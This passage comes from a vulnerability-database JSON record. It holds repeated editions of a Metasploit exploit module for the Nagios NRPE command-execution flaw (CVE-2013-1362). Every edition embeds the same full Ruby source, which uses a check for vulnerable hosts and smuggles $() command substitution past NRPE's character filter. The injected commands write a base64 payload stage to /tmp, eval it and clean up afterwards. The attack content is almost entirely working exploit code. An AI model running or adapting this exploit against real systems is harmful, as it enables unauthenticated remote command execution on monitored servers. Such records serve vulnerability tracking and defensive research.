Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T01:17:44", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T03:15:35", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T03:15:35", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T15:37:36", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T15:37:36", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T19:39:02", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T19:39:02", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T09:38:44", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": 